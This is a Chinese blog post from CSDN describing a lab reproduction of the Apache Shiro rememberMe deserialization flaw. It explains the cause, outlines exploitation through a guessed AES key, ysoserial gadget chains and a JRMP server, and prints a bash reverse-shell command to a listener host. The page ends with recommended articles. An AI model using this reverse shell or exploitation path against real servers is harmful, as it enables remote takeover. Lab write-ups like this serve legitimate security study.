shiro反序列化的简单漏洞复现

于 2024-08-23 22:21:16 发布
阅读量422 收藏 8
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63920195/article/details/141475327
版权

环境介绍

192.168.15.166作为漏洞靶场

192.168.15.129为接收反弹shell的主机

漏洞成因

Shiro反序列化漏洞主要是由于Shiro框架在处理序列化数据时未能正确验证或限制用户输入所导致的。这种漏洞利用了Java对象序列化和反序列化的机制,攻击者可以通过精心构造的恶意序列化数据进行攻击,导致远程代码执行或其他严重的安全问题。以下是Shiro反序列化漏洞的成因分析:

  1. Java序列化机制的特性

    • Java对象序列化允许将对象的状态转换为字节流,以便存储或通过网络传输。当这些字节流被反序列化时,Java会将其还原为对象。
    • 如果不严格控制反序列化过程中允许的类或对象,恶意用户可以通过发送特定的序列化数据,触发反序列化过程执行意料之外的代码。

  2. Shiro中的Session机制

    • Shiro框架通常会将用户的会话数据(Session)序列化后存储在客户端(如Cookie)或服务器端。
    • 当用户发送请求时,这些序列化数据会被Shiro反序列化为会话对象,以恢复用户的会话状态。

  3. 未充分验证输入数据

    • Shiro框架在反序列化Session数据时,未对传入的序列化数据进行充分的验证,导致攻击者可以构造恶意的序列化对象。
    • 这些恶意对象在被反序列化时,会调用特定类的恶意方法,从而触发任意代码执行。

  4. 利用常见的Java反序列化漏洞链

    • 攻击者通常利用常见的Java反序列化漏洞链(如使用Commons Collections库)来构造恶意对象链,并通过反序列化触发该链中的代码执行。
    • 这种方法依赖于Java的反射机制,攻击者可以调用任意类的任意方法,而不需要显式地在代码中调用这些方法。

漏洞就是在点击记住我的时候

会有一个rememberme字段

它的运作流程是:

rememberme-->序列化-->aes加密-->base64编码发送给服务器接收

服务器再把它base64解码-->aes解密-->最后反序列化

如果攻击者精心构造恶意类 这些类会在反序列化过程中触发恶意代码执行

利用的过程就是:

选择或构造恶意类链

  • 恶意类链是由一组可被反序列化的类组成,这些类会在反序列化过程中触发恶意代码执行。常用的恶意类链可能涉及Commons CollectionsJavassist等库。
  • 利用工具(如ysoserial)可以生成常见的Java反序列化payload,这些payload包含已经构造好的恶意类链。

注入恶意代码

  • 在恶意类链中,利用反射、动态代理或其他方法注入恶意代码,如执行系统命令或下载恶意文件。
  • 典型的payload会调用系统命令执行(如Runtime.getRuntime().exec("命令")),从而控制目标服务器。

序列化恶意类

  • 将恶意类链序列化为字节流,这一步通常可以通过ysoserial等工具自动完成。

加密与编码

  • 将序列化的恶意数据进行AES加密,并进行Base64编码,模拟Shiro框架的工作流程。

发送恶意Payload

  • 将构造好的恶意数据以“remember me”Cookie的形式发送给目标服务器。
  • 服务器接收到后,在Base64解码、AES解密、反序列化的过程中,触发恶意类链,从而执行恶意代码。

详细点说:

但是能利用漏洞的前提是 能够获取aes密钥(可以尝试爆破获取)

然后搭建一个VPS服务,使用序列化工具ysoserial指定利用链生成可反弹shell命令的序列化数据

当后面有客户端请求服务时,搭建的这个JRMP就会返回该序列化数据

生成AES加密-->base64编码后的rememberme字段(字段原内容就是去访问该vps获取序列化数据)

当服务器解码解密后得到序列化数据后 就会触发恶意构造类链 从而执行反弹shell的命令

最后攻击机监听端口即可成功getshell

而使用工具就省去了以上的步骤 直接一步到位

利用工具getshell

检测当前密钥

执行命令

虽然显示执行失败

bash -c 'bash -i >& /dev/tcp/192.168.15.129/8888 0>&1'

但是还是可以反弹到shell

v1nche3
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shiro反序列化复现.zip
08-03
"shiro反序列化复现.zip"这个压缩包很可能是为了帮助开发者或者安全研究人员理解并重现Apache Shiro中的反序列化漏洞反序列化漏洞通常发生在程序接收来自不可信源的序列化对象时,如果这个对象包含了恶意构造的...
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
shiro反序列化工具,加强版
12-27
在"shiro反序列化工具,加强版"这个主题中,我们主要关注的是Shiro框架中可能存在的反序列化漏洞以及如何利用和防范这些漏洞反序列化漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有...
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
Shiro反序列化流量分析.pdf
05-10
Shiro反序列化漏洞中,AES用于加密RememberMe令牌。其主要参数包括: - mode:加密模式,如CBC(Cipher Block Chaining)模式,需要一个初始化向量(IV)。 - padding:填充方式,如PKCS5或PKCS7,确保数据长度...
数采网关面临的安全挑战
编程之道在明明德在亲民在止于至善
08-22 391
数采网关面临的安全挑战
AI安全-文生图
深度安全实验室
08-15 536
AI安全-文生图
92.WEB渗透测试-信息收集-Google语法(6)
最新发布
计算机王的博客
08-22 221
web渗透测试
[图解]片段16 ESS状态机图-SysMLEA建模住宅安全系统
rolt的专栏
08-19 977
好,我们看,首先,电源管理这里,有两个状态
华为账号“一键登录”能力让美团用户尽享安全便捷的登录体验
HarmonyOS SDK闭源开放能力技术团队
08-19 668
3.将获取到的匿名手机号设置给下面PreviewLoginButtonPage示例代码中的quickLoginAnonymousPhone变量,调用LoginWithHuaweiIDButton组件,实现应用自己的登录页面,并展示华为账号一键登录按钮和华为账号用户认证协议(Account Kit提供跳转链接,应用需实现协议跳转,参见约束与限制第2点),用户同意协议并点击一键登录按钮后,可获取到Authorization Code,将该值传给应用服务器用于获取用户信息(完整手机号、UnionID)。
网络安全简介(入门篇)
不甘于平凡的溃败的博客
08-18 1018
博主现从事网络安全行业,在工作之余自己从网上、书籍以及自己总结出一些关于网络安全的知识,本文采用理论和实践相结合方式进行讲解,首先对网络安全进行理论介绍,最后再结合一个安全渗透小案例实践讲解;特分享给大家,供从事计算机软件、网络信息安全领域以及网络安全爱好者学习、交流。
Gartner发布2024年终端和工作空间安全成熟度曲线:24项相关技术发展和应用状况及趋势
lurenjia404的博客
08-22 678
由于攻击者使用人工智能来增强网络钓鱼和终端攻击,企业需要高级安全措施来阻止入侵行为。此技术成熟度曲线可帮助安全和风险管理领导者识别可增强终端和工作空间保护的技术。
CDGA|数据治理落地实践指南:构建高效、安全的数据管理体系
vx15302782362的博客
08-19 420
数据治理是一项长期而复杂的工程,需要企业上下共同努力,从战略高度出发,建立科学的数据治理体系,并持续投入资源进行优化和完善。通过本文提供的实践指南,希望能够帮助企业更好地实施数据治理,充分发挥数据的价值,为企业的发展提供有力支撑。
第132天:内网安全-横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
weixin_71529930的博客
08-19 809
域控环境0day.org通过网盘分享的文件:131-0day.org内网域环境镜像文件链接: https://pan.baidu.com/s/1rf_gHVJSNG8PEsiSr7DFSw?pwd=r5jc 提取码: r5jc给win7设置一张nat网卡,其他各个主机都设置为vm2。
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 866
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
独立ip为何高级又安全
Together_GPT的博客
08-22 177
独立IP,也称为静态IP,是指由网络服务商直接分配给用户的一个独立的IP地址,该IP地址不会因用户关机、重启或断开网络而发生改变。1. 防止IP被封锁:在使用共享IP时,如果其中一个用户因违反规定或被举报而被封锁IP,其他用户也可能会受到影响。3. 隐藏真实IP地址:使用独立IP可以更好地保护用户的隐私和安全,因为用户可以通过代理服务器或VPN等手段使用独立IP进行上网,隐藏自己的真实IP地址,防止被黑客攻击或被追踪。搜索引擎会认为拥有独立IP的网站更可靠,更容易被收录和排名。
SQL注入(cookie、base64、dnslog外带、搜索型注入)
m0_74249600的博客
08-13 1264
本文讲述了cookie注入、base64注入、dnslog外带、搜索型注入等sql注入的基本注入类型,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
端点安全新纪元:EDR与XDR技术的融合应用
A526847的博客
08-18 566
在数字时代,随着网络威胁的日益复杂化和多样化,端点安全成为了企业组织不可或缺的重要防线。传统的防病毒软件和防火墙等安全解决方案已难以满足当前的安全需求,而EDR(端点检测与响应)和XDR(扩展检测与响应)技术的兴起,正引领着端点安全进入一个全新的纪元。本文将探讨EDR与XDR技术的融合应用,以及它们如何共同提升企业的安全防护能力。
利用MongoDB进行数据治理,防范构建生成式AI应用程序时的潜在安全风险
MongoDBChina的博客
08-20 790
数据安全和数据准确性是开发AI应用时的两大痛点,利用MongoDB灵活的文档数据模型和开发者原生查询API,简化数据库部署和管理,构建弹性应用程序,为组织数据提供嵌入式安全控制能力。
shiro反序列化检测
12-18
Shiro反序列化检测是指对Shiro框架可能存在的反序列化漏洞进行检测和防护的一种安全措施。通过该方法,可以防止黑客利用Shiro框架的反序列化漏洞进行攻击。 Shiro是Java领域中广泛使用的开源安全框架,用于认证、授权和会话管理等安全功能。然而,由于Java的序列化和反序列化机制的特性,可能导致应用程序在反序列化时存在安全风险。黑客可以通过构造恶意序列化数据,导致应用程序反序列化时执行恶意代码,从而实施攻击,比如远程代码执行、命令注入等。 为了防止这种安全风险,可以在Shiro框架中添加反序列化检测机制。这个机制可以对反序列化的数据进行检查,确保其合法性,并防止执行恶意代码。常见的防护方法包括: 1. 设置白名单:限制反序列化的类的类型和来源,只允许反序列化特定的类。 2. 安全配置:对Shiro框架及相关功能进行正确的安全配置,合理设置权限和角色。 3. 使用SafeXMLDecoder:SafeXMLDecoder是一个安全的XML反序列化工具,可以对输入数据进行验证和过滤,阻止恶意代码的执行。 此外,定期更新Shiro框架和依赖库,确保及时获取最新的安全补丁也是非常重要的。同时,开发人员也需要对Shiro框架和反序列化漏洞有一定的了解,及时关注相关安全动态,以便及时修复和更新。 总之,Shiro反序列化检测是一项重要的安全措施,可以有效预防黑客利用反序列化漏洞Shiro框架进行攻击。通过合理的安全配置和验证机制,可以提高应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值